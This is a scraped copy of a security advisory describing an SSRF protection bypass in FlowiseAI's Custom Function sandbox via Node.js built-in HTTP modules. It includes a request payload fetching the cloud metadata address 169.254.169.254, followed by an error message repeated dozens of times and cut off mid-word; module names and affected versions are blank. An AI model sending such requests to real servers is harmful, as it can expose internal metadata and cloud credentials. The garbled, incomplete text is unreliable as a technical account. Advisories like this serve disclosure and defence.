FlowiseAI SSRF Bypass via Unprotected Node.js Built-in Modules in Custom Function Sandbox

SSRF Protection Bypass via Unprotected Built-in HTTP Modules in Custom Function Sandbox Vulnerability Overview A Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature of FlowiseAI. Although the application enforces SSRF protection on the and libraries via , Node.js built-in modules , , and are allowed in the sandbox environment without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (such as cloud provider metadata services). Impact Scope Affected Versions: (npm) Content-Type: application/json Authorization: Bearer { "javascriptFunction": "const axios = require('axios'); return (await axios.get('http://169.254.169.254/latest/meta'))" } // Response { "statusCode": 500, "success": false, "message": "Error: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.executeCustomFunction - Error running custom function: nodesService.execu

Goal Reached Thanks to every supporter — we hit 100%!

FlowiseAI SSRF Bypass via Unprotected Node.js Built-in Modules in Custom Function Sandbox

More from this source